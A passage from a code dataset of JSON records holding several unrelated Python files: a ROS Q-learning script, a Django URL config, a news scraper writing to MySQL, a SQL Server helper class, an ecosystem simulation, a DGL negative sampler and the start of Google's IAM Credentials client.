else:\n self.convergence_cnt = 0\n\n if self.convergence_cnt == 50:\n print(\"self.convergence_cnt reached 50 at \"+str(time.time()-t0))\n if self.convergence_cnt == 100:\n print(\"self.convergence_cnt reached 100 at \"+str(time.time()-t0))\n if self.convergence_cnt == 150:\n print(\"self.convergence_cnt reached 150 at \"+str(time.time()-t0))\n\n # if the Q matrix has remained the same for 200 steps, then we consider it to be converged\n if self.convergence_cnt == 200:\n print(\"self.convergence_cnt reached 200 at \"+str(time.time()-t0))\n print(\"Q Matrix has converged! 
Training done!\")\n self.converged = True\n \n \"\"\"Save the q_matrix file to csv\"\"\"\n def save_q_matrix(self):\n with open('qmatrix.csv', 'w', newline='') as fp:\n writer = csv.writer(fp)\n for state in range(64):\n writer.writerow(self.qmatrix.q_matrix[state].q_matrix_row)\n return\n\n \"\"\"Run Q-Learning algorithm until convergence\"\"\"\n def run(self):\n while self.converged is False:\n self.perform_action()\n rospy.sleep(1)\n\n self.save_q_matrix()\n \nif __name__ == \"__main__\":\n node = QLearning()\n node.run()\n","sub_path":"scripts/q_learning.py","file_name":"q_learning.py","file_ext":"py","file_size_in_byte":6737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"198800401","text":"from django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import static\nfrom django.views.generic import TemplateView\n\nfrom django.contrib import admin\n\nimport symposion.views\nfrom pinaxcon import views\nfrom pinaxcon.attendees import views as attendee_views\n\nurlpatterns = [\n url(r\"^$\", TemplateView.as_view(template_name=\"homepage.html\"), name=\"home\"),\n url(r\"^agenda/$\", TemplateView.as_view(template_name=\"agenda.html\"), name=\"agenda\"),\n url(r\"^becas/$\", views.becas, name=\"becas\"),\n url(r\"^schedule.json$\", views.schedule_json, name=\"schedule_json\"),\n url(r\"^process-acreditation\", views.process_acreditation,\n name=\"process_acreditation\"),\n url(r\"^diversidad/$\", TemplateView.as_view(template_name=\"declaracion_diversidad.html\"), name=\"diversidad\"),\n url(r\"^codigo-conducta/$\", TemplateView.as_view(template_name=\"codigo_conducta.html\"), name=\"codigo-de-conducta\"),\n url(r\"^forma-parte/$\", TemplateView.as_view(template_name=\"forma_parte.html\"), name=\"forma-parte\"),\n url(r\"^alojamiento/$\", TemplateView.as_view(template_name=\"alojamiento.html\"), name=\"alojamiento\"),\n url(r\"^organizadores/$\", TemplateView.as_view(template_name=\"organizadores.html\"), name=\"organizadores\"),\n url(r\"^sponsors/$\", TemplateView.as_view(template_name=\"sponsors.html\"), name=\"sponsors\"),\n url(r\"^admin/\", include(admin.site.urls)),\n\n url(r\"^account/\", include(\"account.urls\")),\n\n url(r\"^dashboard/\", symposion.views.dashboard, name=\"dashboard\"),\n\n url(r\"^speaker/\", include(\"symposion.speakers.urls\")),\n url(r\"^proposals/\", include(\"symposion.proposals.urls\")),\n url(r\"^sponsors/\", include(\"symposion.sponsorship.urls\")),\n url(r\"^reviews/\", include(\"symposion.reviews.urls\")),\n url(r\"^schedule/\", include(\"symposion.schedule.urls\")),\n url(r\"^attendee/\", include(\"pinaxcon.attendees.urls\")),\n url(r\"^teams/\", include(\"symposion.teams.urls\")),\n\n url(r\"^boxes/\", include(\"pinax.boxes.urls\")),\n url(r'^captcha/', include('captcha.urls')),\n url(r\"^\", include(\"pinax.pages.urls\")),\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"pinaxcon/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"235284022","text":"# -*-coding:utf-8-*-\nimport urllib.request\nfrom lxml import etree\nimport re\nimport datetime\nimport random\nimport pymysql.cursors\n\naaa = \"123\"\n# 创建链接(connect to the database)\nconn = pymysql.connect(host='localhost',\n port=3306,\n # unix_socket='/tmp/mysql.sock',\n user='root',\n passwd=\" \",\n db='FTTT',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n\nurl='http://www.ftchinese.com/channel/chinareport.html?page=2'\n\ndef store(title, content):\n with conn.cursor() as cursor:\n sql = \"INSERT INTO `政经` (`title`, `content`) VALUES (%s,%s)\"\n cursor.execute(sql, (title, content))\n cursor.connection.commit()\n print(\"in store\")\n\ntry:\n for k in range(1, 4):\n new_link = re.sub('page=\\d+', 'page=%d' % k, url, re.S)\n response = urllib.request.urlopen(new_link)\n html = response.read()\n page = etree.HTML(html)\n print(k)\n print(new_link)\n title_ = page.xpath('//h2[@class=\"item-headline\"]/a')\n content_ = page.xpath('//div[@class=\"item-lead\"]')\n time = page.xpath('//div[@class=\"item-time\"]')\n\n j = len(title_)\n for i in range(0, j):\n print(title_[i].text)\n print(content_[i].text)\n print(time[i].text)\n store(title_[i].text,content_[i].text)\n # store('sspk', \"dd\")\n\n with conn.cursor() as cursor:\n # Create a new record\n sql = \"INSERT INTO `政经` (`title`, `content`) VALUES (%s,%s)\"\n cursor.execute(sql, ('', 'very-secret'))\n # connection is not autocommit by default. So you must commit to save\n # your changes.\n conn.commit()\n\n with conn.cursor() as cursor:\n # Read a single record\n sql = \"SELECT `title`, `content` FROM `政经` WHERE `title`=%s\"\n cursor.execute(sql, ('webmaster@python.org',))\n result = cursor.fetchone()\n print(result)\n\nfinally:\n conn.close()\n# # 创建游标\n# cur = conn.cursor()\n# # 执行SQL,并返回受影响行数\n# cur.execute(\"USE scraping\")\n# #random.seed(datetime.datetime.now())\n#\n\n\n\n#\n# cur.execute(\"SELECT * FROM pages WHERE id=1\")\n# print(cur.fetchone())\n# cur.close()\n# conn.close()\n# def getLinks(articleUrl):\n\n\n\n\n\n","sub_path":"FT/政经标题/title2.py","file_name":"title2.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"529633737","text":"\n\n# conn = pymssql.connect(host='localhost',\n# user='sa',\n# password='1',\n# database='test',\n# charset='utf8')\n# #查看连接是否成功\n# cursor = conn.cursor()\n# sql = 'select * from user'\n# cursor.execute(sql)\n# #用一个rs变量获取数据\n# rs = cursor.fetchall()\n#\n# print(rs)\n\n# -*- coding:utf-8 -*-\n\nimport pymssql\n\nclass MSSQL:\n def __init__(self,host,user,pwd,db):\n self.host = host\n self.user = user\n self.pwd = pwd\n self.db = db\n\n def __GetConnect(self):\n if not self.db:\n raise(NameError,\"没有设置数据库信息\")\n self.conn = pymssql.connect(host=self.host,user=self.user,password=self.pwd,database=self.db,charset=\"utf8\")\n cur = self.conn.cursor()\n if not cur:\n raise(NameError,\"连接数据库失败\")\n else:\n return cur\n\n def ExecQuery(self,sql):\n cur = self.__GetConnect()\n cur.execute(sql)\n resList = cur.fetchall()\n\n #查询完毕后必须关闭连接\n self.conn.close()\n return resList\n\n def ExecNonQuery(self,sql):\n cur = self.__GetConnect()\n cur.execute(sql)\n self.conn.commit()\n self.conn.close()\n\n# ms = MSSQL(host=\"123.57.28.87\",user=\"sa\",pwd=\"1\",db=\"nzkh\")\n# reslist = ms.ExecQuery(\"select * from tb_User\")\n\nms = MSSQL(host=\"127.0.0.1\",user=\"sa\",pwd=\"1\",db=\"test\")\nreslist = ms.ExecQuery(\"select * from user\")\nfor i in reslist:\n print(i)\n\n# newsql=\"update webuser set name='%s' where =1\"%u'测试'\n# print(newsql)\n# ms.ExecNonQuery(newsql.encode('utf-8'))","sub_path":"conn_sqlserver.py","file_name":"conn_sqlserver.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"635357724","text":"import mapa as mp\nimport cell\nimport event\nimport cap as cp\nimport obsrand\nimport map_constructor as mc\nfrom random import uniform\n\n\ndef foto(m, n):\n\t\"\"\"\n\tDado um mapa m, devolve uma fotografia do sistema.\n\t\"\"\"\n\tlst = [(i, j) for j in range(len(m)) for i in range(len(m))]\n\tft = []\n\tfor i in range(n):\n\t\tft.append([(c, cell.getLevel(cell.getCell(m, c), i)) for c in lst])\n\n\treturn ft\n\n\ndef sim(N=4, dim=10, Qinit=[25, 20, 15, 10], Init=\"ran\", Tmax=30, Tmud=1, Tloc=1,\n\t\tRmig=0.8, Prain=0.01, Qwat=0.01, Dry=0.8, Nfotos=200):\n\n\t# Construir o mapa (usando oásis, ou randomMap)\n\tif Init == \"ran\":\n\t\tm = mc.randomMap(dim, N, Qinit)\n\telse:\n\t\tm = mc.oasis(dim, N)\n\n\t# Tempo médio por foto.\n\tTfot = Tmax/Nfotos\n\tfList = []\n\n\tcap = cp.newC()\n\tcurrent_event = event.evt(0, \"fot\")\n\tcurrent_time = event.time(current_event)\n\tcurrent_kind = event.kind(current_event)\n\tcurrent_cell = event.cell(current_event)\n\tcurrent_level = event.level(current_event)\n\n\t# Establecer a estação atual e adicionar a próxima mudança à CAP.\n\test = \"hum\"\n\tcap = cp.addE(cap, event.evt(current_time+obsrand.exprandom(Tmud), \"est\"))\n\n\t# Adicionar um evento por cada célula e para cada nível trófico à CAP.\n\tfor n in range(1, N+1):\n\t\tfor i in range(1,dim+1):\n\t\t\tfor j in range(1,dim+1):\n\t\t\t\tcap = cp.addE(cap, event.evt(current_time+obsrand.exprandom(Tloc), \"loc\", (i, j), n))\n\n\t# While Loop até o tempo atual ser maior ou igual a Tmax.\n\twhile current_time <= Tmax:\n\n\t\t# Se o evento for \"ft\": tirar uma fotografia e escrever no ficheiro\n\t\t# e adicionar a próxima fotografia à CAP (tempo local + tempo entre fotos (Tmax/Nfotos))\n\t\tif current_kind == \"fot\":\n\t\t\tfList.append(foto(m, N))\n\t\t\tcap = cp.addE(cap, event.evt(\n\t\t\t\tcurrent_time+Tfot, \"fot\"))\n\t\t\tprint(\"foto\")\n\n\t\t# Se o evento for \"est\": mudar de estação e adicionar o próximo evento deste tipo à CAP.\n\t\telif current_kind == \"est\":\n\t\t\tif est == \"hum\":\n\t\t\t\test = \"sec\"\n\t\t\telse:\n\t\t\t\test = \"hum\"\n\t\t\tprint(est, current_time)\n\t\t\tcap = cp.addE(cap, event.evt(current_time+obsrand.exprandom(Tmud), \"est\"))\n\n\t\t# Se um evento for \"loc\": mudar as coisas nessa célula e adicionar o próximo \"loc\" à CAP.\n\t\telif current_kind == \"loc\":\n\t\t\tcoor = event.cell(current_event)\n\t\t\tquad = cell.getCell(m, coor)\n\t\t\tlvl = event.level(current_event)\n\n\t\t\tif lvl == 1:\n\t\t\t\tq_0 = cell.getLevel(quad, 1)\n\t\t\t\ta_2 = cell.quantLevel(m, mp.viz(coor, 2, dim), 1)\n\t\t\t\tk_2 = 0\n\n\t\t\t\tfor n in range(3, N+1):\n\t\t\t\t\tk_2 += cell.quantLevel(m, mp.viz(coor, 2, dim), n)\n\t\t\t\t\n\t\t\t\tif a_2 == 0:\n\t\t\t\t\tt_cs = -1\n\t\t\t\telse:\n\t\t\t\t\tr = k_2/(2*a_2)\n\t\t\t\t\tif r < 1:\n\t\t\t\t\t\tt_cs = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tt_cs = 1 - min(2, r)\n\n\t\t\t\tif est == \"hum\":\n\t\t\t\t\tq_ch = uniform(0.9*Qwat, min(1, 1.1*Qwat))\n\t\t\t\telse:\n\t\t\t\t\tq_ch = -Dry*q_0\n\n\t\t\t\tq = q_ch + q_0*(1 + t_cs)\n\n\t\t\t\tif q < 0.01:\n\t\t\t\t\tq = 0\n\n\t\t\t\tcell.changeCell(m, coor, 1, q)\n\n\t\t\telif lvl > 1:\n\t\t\t\tif cell.quantLevel(m, mp.viz(coor, 1, dim), lvl) == 0:\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\t# Calcular f_w\n\t\t\t\t\ta_m = cell.quantLevel(m, mp.viz(coor, lvl, dim), 1)\n\t\t\t\t\tt_m = 0\n\t\t\t\t\tfor n in range(2, N+1):\n\t\t\t\t\t\tt_m += cell.quantLevel(m, mp.viz(coor, lvl, dim), n)\n\t\t\t\t\tr_w = a_m/t_m\n\n\t\t\t\t\tif r_w < 
1:\n\t\t\t\t\t\tf_w = r_w - 1\n\t\t\t\t\telif 1 < r_w:\n\t\t\t\t\t\tf_w = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tf_w = max(1, r-2)\n\n\t\t\t\t\t# Calcular f_a\n\t\t\t\t\tc_2 = cell.quantLevel(m, mp.viz(coor, 2, dim), lvl-1)\n\t\t\t\t\ti_2 = cell.quantLevel(m, mp.viz(coor, 2, dim), lvl)\n\n\t\t\t\t\tr_a = c_2/i_2\n\n\t\t\t\t\tif r_a < 1:\n\t\t\t\t\t\tf_a = r_a - 1\n\t\t\t\t\telif 1 < r_a:\n\t\t\t\t\t\tf_a = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tf_a = max(1, r-2)\n\n\t\t\t\t\t# Calcular f_p\n\t\t\t\t\tif lvl == N:\n\t\t\t\t\t\tp_2 = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tp_2 = cell.quantLevel(m, mp.viz(coor, 2, dim), lvl-1)\n\n\t\t\t\t\tr_p = p_2/2*i_2\n\n\t\t\t\t\tif r_p < 1:\n\t\t\t\t\t\tf_p = -(r_p - 1)\n\t\t\t\t\telif 1 < r_p:\n\t\t\t\t\t\tf_p = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tf_p = -max(1, r-2)\n\n\t\t\t\t\tf = (f_w + f_a + f_p - max(f_w, f_a, f_p))/2\n\n\t\t\t\t\tif f < 0:\n\t\t\t\t\t\tt = uniform(0, 1+f)\n\t\t\t\t\telif f == 0:\n\t\t\t\t\t\tt = uniform(0.9, 1.1)\n\t\t\t\t\telse:\n\t\t\t\t\t\tt = uniform(1, 1+f)\n\n\t\t\t\t\tq_0 = cell.getLevel(quad, n)\n\n\t\t\t\t\tif q_0 == 0 and f > 0:\n\t\t\t\t\t\tQ_0 = cell.quantLevel(m, mp.viz(coor, 2, dim), lvl)\n\n\t\t\t\t\t\tq = (Q_0*Rmig*t)/4\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tq = q_0*t\n\n\t\t\t\t\t\tif q < 0.01:\n\t\t\t\t\t\t\tq = 0\n\n\t\t\t\t\tcell.changeCell(m, coor, lvl, q)\n\n\t\t\tcap = cp.addE(cap, event.evt(\n\t\t\t\tobsrand.exprandom(Tloc), \"loc\", coor, lvl))\n\n\t\tcap = cp.delE(cap)\n\t\tcurrent_event = cp.nextE(cap)\n\t\tcurrent_time = event.time(current_event)\n\t\tcurrent_kind = event.kind(current_event)\n\t\tcurrent_cell = event.cell(current_event)\n\t\tcurrent_level = event.level(current_event)\n\n\t# Escrever as coisas no ficheiro.\n\n\twith open('resultados.txt', 'w') as f:\n\t\tf.write(str(dim) + '\\n')\n\t\tf.write(str(N) + '\\n')\n\t\tfor line in fList:\n\t\t\tf.write(str(line)+'\\n')\n\n\nsim(Tmax = 5)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
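obsrand.exprandom is not shown in this file; given how it is used (random inter-event waiting times with mean Tmud or Tloc), it is presumably the standard inverse-CDF exponential sampler, something like:

# Hypothetical sketch of obsrand.exprandom; the real module is not shown.
from math import log
from random import random

def exprandom(mean):
    # Exponentially distributed waiting time with the given mean.
    return -mean * log(1.0 - random())

The standard library's random.expovariate(1.0/mean) draws from the same distribution.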
+{"seq_id":"442250049","text":"\"\"\"Negative samplers.\"\"\"\n\nfrom _collections_abc import Mapping\n\nimport torch\nfrom torchdata.datapipes.iter import Mapper\n\nfrom .data_format import LinkPredictionEdgeFormat\n\n\nclass NegativeSampler(Mapper):\n \"\"\"\n A negative sampler used to generate negative samples and return\n a mix of positive and negative samples.\n \"\"\"\n\n def __init__(\n self,\n datapipe,\n negative_ratio,\n output_format,\n ):\n \"\"\"\n Initlization for a negative sampler.\n\n Parameters\n ----------\n datapipe : DataPipe\n The datapipe.\n negative_ratio : int\n The proportion of negative samples to positive samples.\n output_format : LinkPredictionEdgeFormat\n Determines the edge format of the output data.\n \"\"\"\n super().__init__(datapipe, self._sample)\n assert negative_ratio > 0, \"Negative_ratio should be positive Integer.\"\n self.negative_ratio = negative_ratio\n self.output_format = output_format\n\n def _sample(self, data):\n \"\"\"\n Generate a mix of positive and negative samples.\n\n Parameters\n ----------\n data : LinkPredictionBlock\n An instance of 'LinkPredictionBlock' class requires the 'node_pair'\n field. This function is responsible for generating negative edges\n corresponding to the positive edges defined by the 'node_pair'. In\n cases where negative edges already exist, this function will\n overwrite them.\n\n Returns\n -------\n LinkPredictionBlock\n An instance of 'LinkPredictionBlock' encompasses both positive and\n negative samples.\n \"\"\"\n node_pairs = data.node_pair\n if isinstance(node_pairs, Mapping):\n if self.output_format == LinkPredictionEdgeFormat.INDEPENDENT:\n data.label = {}\n else:\n data.negative_head, data.negative_tail = {}, {}\n for etype, pos_pairs in node_pairs.items():\n self._collate(\n data, self._sample_with_etype(pos_pairs, etype), etype\n )\n if self.output_format == LinkPredictionEdgeFormat.HEAD_CONDITIONED:\n data.negative_tail = None\n if self.output_format == LinkPredictionEdgeFormat.TAIL_CONDITIONED:\n data.negative_head = None\n else:\n self._collate(data, self._sample_with_etype(node_pairs))\n return data\n\n def _sample_with_etype(self, node_pairs, etype=None):\n \"\"\"Generate negative pairs for a given etype form positive pairs\n for a given etype.\n\n Parameters\n ----------\n node_pairs : Tuple[Tensor, Tensor]\n A tuple of tensors that represent source-destination node pairs of\n positive edges, where positive means the edge must exist in the\n graph.\n etype : str\n Canonical edge type.\n\n Returns\n -------\n Tuple[Tensor, Tensor]\n A collection of negative node pairs.\n \"\"\"\n raise NotImplementedError\n\n def _collate(self, data, neg_pairs, etype=None):\n \"\"\"Collates positive and negative samples into data.\n\n Parameters\n ----------\n data : LinkPredictionBlock\n The input data, which contains positive node pairs, will be filled\n with negative information in this function.\n neg_pairs : Tuple[Tensor, Tensor]\n A tuple of tensors represents source-destination node pairs of\n negative edges, where negative means the edge may not exist in\n the graph.\n etype : str\n Canonical edge type.\n \"\"\"\n pos_src, pos_dst = (\n data.node_pair[etype] if etype is not None else data.node_pair\n )\n neg_src, neg_dst = neg_pairs\n if self.output_format == LinkPredictionEdgeFormat.INDEPENDENT:\n pos_label = torch.ones_like(pos_src)\n neg_label = torch.zeros_like(neg_src)\n src = torch.cat([pos_src, neg_src])\n dst = torch.cat([pos_dst, neg_dst])\n label = torch.cat([pos_label, neg_label])\n if 
etype is not None:\n data.node_pair[etype] = (src, dst)\n data.label[etype] = label\n else:\n data.node_pair = (src, dst)\n data.label = label\n else:\n if self.output_format == LinkPredictionEdgeFormat.CONDITIONED:\n neg_src = neg_src.view(-1, self.negative_ratio)\n neg_dst = neg_dst.view(-1, self.negative_ratio)\n elif (\n self.output_format == LinkPredictionEdgeFormat.HEAD_CONDITIONED\n ):\n neg_src = neg_src.view(-1, self.negative_ratio)\n neg_dst = None\n elif (\n self.output_format == LinkPredictionEdgeFormat.TAIL_CONDITIONED\n ):\n neg_dst = neg_dst.view(-1, self.negative_ratio)\n neg_src = None\n else:\n raise TypeError(\n f\"Unsupported output format {self.output_format}.\"\n )\n if etype is not None:\n data.negative_head[etype] = neg_src\n data.negative_tail[etype] = neg_dst\n else:\n data.negative_head = neg_src\n data.negative_tail = neg_dst\n","sub_path":"python/dgl/graphbolt/negative_sampler.py","file_name":"negative_sampler.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
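The shape convention behind the CONDITIONED formats above: with negative_ratio = k, the flat tensor of k negatives per positive pair is reshaped so that each row holds the k negatives for one positive.

import torch

neg_src = torch.arange(6)   # 3 positive pairs, negative_ratio = 2
print(neg_src.view(-1, 2))  # tensor([[0, 1], [2, 3], [4, 5]])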
+{"seq_id":"311721584","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Accesses the google.iam.credentials.v1 IAMCredentials API.\"\"\"\n\nimport pkg_resources\nimport warnings\n\nfrom google.oauth2 import service_account\nimport google.api_core.client_options\nimport google.api_core.gapic_v1.client_info\nimport google.api_core.gapic_v1.config\nimport google.api_core.gapic_v1.method\nimport google.api_core.gapic_v1.routing_header\nimport google.api_core.grpc_helpers\nimport google.api_core.path_template\nimport grpc\n\nfrom google.cloud.iam_credentials_v1.gapic import iam_credentials_client_config\nfrom google.cloud.iam_credentials_v1.gapic.transports import (\n iam_credentials_grpc_transport,\n)\nfrom google.cloud.iam_credentials_v1.proto import common_pb2\nfrom google.cloud.iam_credentials_v1.proto import iamcredentials_pb2_grpc\nfrom google.protobuf import duration_pb2\n\n\n_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution(\"google-cloud-iam\").version\n\n\nclass IAMCredentialsClient(object):\n \"\"\"\n A service account is a special type of Google account that belongs to your\n application or a virtual machine (VM), instead of to an individual end user.\n Your application assumes the identity of the service account to call Google\n APIs, so that the users aren't directly involved.\n\n Service account credentials are used to temporarily assume the identity\n of the service account. Supported credential types include OAuth 2.0 access\n tokens, OpenID Connect ID tokens, self-signed JSON Web Tokens (JWTs), and\n more.\n \"\"\"\n\n SERVICE_ADDRESS = \"iamcredentials.googleapis.com:443\"\n \"\"\"The default address of the service.\"\"\"\n\n # The name of the interface for this client. 
This is the key used to\n # find the method configuration in the client_config dictionary.\n _INTERFACE_NAME = \"google.iam.credentials.v1.IAMCredentials\"\n\n @classmethod\n def from_service_account_file(cls, filename, *args, **kwargs):\n \"\"\"Creates an instance of this client using the provided credentials\n file.\n\n Args:\n filename (str): The path to the service account private key json\n file.\n args: Additional arguments to pass to the constructor.\n kwargs: Additional arguments to pass to the constructor.\n\n Returns:\n IAMCredentialsClient: The constructed client.\n \"\"\"\n credentials = service_account.Credentials.from_service_account_file(filename)\n kwargs[\"credentials\"] = credentials\n return cls(*args, **kwargs)\n\n from_service_account_json = from_service_account_file\n\n @classmethod\n def service_account_path(cls, project, service_account):\n \"\"\"Return a fully-qualified service_account string.\"\"\"\n return google.api_core.path_template.expand(\n \"projects/{project}/serviceAccounts/{service_account}\",\n project=project,\n service_account=service_account,\n )\n\n def __init__(\n self,\n transport=None,\n channel=None,\n credentials=None,\n client_config=None,\n client_info=None,\n client_options=None,\n ):\n \"\"\"Constructor.\n\n Args:\n transport (Union[~.IamCredentialsGrpcTransport,\n Callable[[~.Credentials, type], ~.IamCredentialsGrpcTransport]): A transport\n instance, responsible for actually making the API calls.\n The default transport uses the gRPC protocol.\n This argument may also be a callable which returns a\n transport instance. Callables will be sent the credentials\n as the first argument and the default transport class as\n the second argument.\n channel (grpc.Channel): DEPRECATED. A ``Channel`` instance\n through which to make calls. This argument is mutually exclusive\n with ``credentials``; providing both will raise an exception.\n credentials (google.auth.credentials.Credentials): The\n authorization credentials to attach to requests. These\n credentials identify this application to the service. If none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n This argument is mutually exclusive with providing a\n transport instance to ``transport``; doing so will raise\n an exception.\n client_config (dict): DEPRECATED. A dictionary of call options for\n each method. If not specified, the default configuration is used.\n client_info (google.api_core.gapic_v1.client_info.ClientInfo):\n The client info used to send a user-agent string along with\n API requests. If ``None``, then default info will be used.\n Generally, you only need to set this if you're developing\n your own client library.\n client_options (Union[dict, google.api_core.client_options.ClientOptions]):\n Client options used to set user options on the client. 
API Endpoint\n should be set through client_options.\n \"\"\"\n # Raise deprecation warnings for things we want to go away.\n if client_config is not None:\n warnings.warn(\n \"The `client_config` argument is deprecated.\",\n PendingDeprecationWarning,\n stacklevel=2,\n )\n else:\n client_config = iam_credentials_client_config.config\n\n if channel:\n warnings.warn(\n \"The `channel` argument is deprecated; use \" \"`transport` instead.\",\n PendingDeprecationWarning,\n stacklevel=2,\n )\n\n api_endpoint = self.SERVICE_ADDRESS\n if client_options:\n if type(client_options) == dict:\n client_options = google.api_core.client_options.from_dict(\n client_options\n )\n if client_options.api_endpoint:\n api_endpoint = client_options.api_endpoint\n\n # Instantiate the transport.\n # The transport is responsible for handling serialization and\n # deserialization and actually sending data to the service.\n if transport:\n if callable(transport):\n self.transport = transport(\n credentials=credentials,\n default_class=iam_credentials_grpc_transport.IamCredentialsGrpcTransport,\n address=api_endpoint,\n )\n else:\n if credentials:\n raise ValueError(\n \"Received both a transport instance and \"\n \"credentials; these are mutually exclusive.\"\n )\n self.transport = transport\n else:\n self.transport = iam_credentials_grpc_transport.IamCredentialsGrpcTransport(\n address=api_endpoint, channel=channel, credentials=credentials\n )\n\n if client_info is None:\n client_info = google.api_core.gapic_v1.client_info.ClientInfo(\n gapic_version=_GAPIC_LIBRARY_VERSION\n )\n else:\n client_info.gapic_version = _GAPIC_LIBRARY_VERSION\n self._client_info = client_info\n\n # Parse out the default settings for retry and timeout for each RPC\n # from the client configuration.\n # (Ordinarily, these are the defaults specified in the `*_config.py`\n # file next to this one.)\n self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(\n client_config[\"interfaces\"][self._INTERFACE_NAME]\n )\n\n # Save a dictionary of cached API call functions.\n # These are the actual callables which invoke the proper\n # transport methods, wrapped with `wrap_method` to add retry,\n # timeout, and the like.\n self._inner_api_calls = {}\n\n # Service calls\n def generate_access_token(\n self,\n name,\n scope,\n delegates=None,\n lifetime=None,\n retry=google.api_core.gapic_v1.method.DEFAULT,\n timeout=google.api_core.gapic_v1.method.DEFAULT,\n metadata=None,\n ):\n \"\"\"\n Generates an OAuth 2.0 access token for a service account.\n\n Example:\n >>> from google.cloud import iam_credentials_v1\n >>>\n >>> client = iam_credentials_v1.IAMCredentialsClient()\n >>>\n >>> name = client.service_account_path('[PROJECT]', '[SERVICE_ACCOUNT]')\n >>>\n >>> # TODO: Initialize `scope`:\n >>> scope = []\n >>>\n >>> response = client.generate_access_token(name, scope)\n\n Args:\n name (str): Required. The resource name of the service account for which the\n credentials are requested, in the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n scope (list[str]): Required. Code to identify the scopes to be included in the OAuth 2.0 access token.\n See https://developers.google.com/identity/protocols/googlescopes for more\n information.\n At least one value required.\n delegates (list[str]): The sequence of service accounts in a delegation chain. 
Each service\n account must be granted the ``roles/iam.serviceAccountTokenCreator``\n role on its next service account in the chain. The last service account\n in the chain must be granted the\n ``roles/iam.serviceAccountTokenCreator`` role on the service account\n that is specified in the ``name`` field of the request.\n\n The delegates must have the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n lifetime (Union[dict, ~google.cloud.iam_credentials_v1.types.Duration]): The desired lifetime duration of the access token in seconds.\n Must be set to a value less than or equal to 3600 (1 hour). If a value is\n not specified, the token's lifetime will be set to a default value of one\n hour.\n\n If a dict is provided, it must be of the same form as the protobuf\n message :class:`~google.cloud.iam_credentials_v1.types.Duration`\n retry (Optional[google.api_core.retry.Retry]): A retry object used\n to retry requests. If ``None`` is specified, requests will\n be retried using a default configuration.\n timeout (Optional[float]): The amount of time, in seconds, to wait\n for the request to complete. Note that if ``retry`` is\n specified, the timeout applies to each individual attempt.\n metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata\n that is provided to the method.\n\n Returns:\n A :class:`~google.cloud.iam_credentials_v1.types.GenerateAccessTokenResponse` instance.\n\n Raises:\n google.api_core.exceptions.GoogleAPICallError: If the request\n failed for any reason.\n google.api_core.exceptions.RetryError: If the request failed due\n to a retryable error and retry attempts failed.\n ValueError: If the parameters are invalid.\n \"\"\"\n # Wrap the transport method to add retry and timeout logic.\n if \"generate_access_token\" not in self._inner_api_calls:\n self._inner_api_calls[\n \"generate_access_token\"\n ] = google.api_core.gapic_v1.method.wrap_method(\n self.transport.generate_access_token,\n default_retry=self._method_configs[\"GenerateAccessToken\"].retry,\n default_timeout=self._method_configs[\"GenerateAccessToken\"].timeout,\n client_info=self._client_info,\n )\n\n request = common_pb2.GenerateAccessTokenRequest(\n name=name, scope=scope, delegates=delegates, lifetime=lifetime\n )\n if metadata is None:\n metadata = []\n metadata = list(metadata)\n try:\n routing_header = [(\"name\", name)]\n except AttributeError:\n pass\n else:\n routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(\n routing_header\n )\n metadata.append(routing_metadata)\n\n return self._inner_api_calls[\"generate_access_token\"](\n request, retry=retry, timeout=timeout, metadata=metadata\n )\n\n def generate_id_token(\n self,\n name,\n audience,\n delegates=None,\n include_email=None,\n retry=google.api_core.gapic_v1.method.DEFAULT,\n timeout=google.api_core.gapic_v1.method.DEFAULT,\n metadata=None,\n ):\n \"\"\"\n Generates an OpenID Connect ID token for a service account.\n\n Example:\n >>> from google.cloud import iam_credentials_v1\n >>>\n >>> client = iam_credentials_v1.IAMCredentialsClient()\n >>>\n >>> name = client.service_account_path('[PROJECT]', '[SERVICE_ACCOUNT]')\n >>>\n >>> # TODO: Initialize `audience`:\n >>> audience = ''\n >>>\n >>> response = client.generate_id_token(name, audience)\n\n Args:\n name (str): Required. 
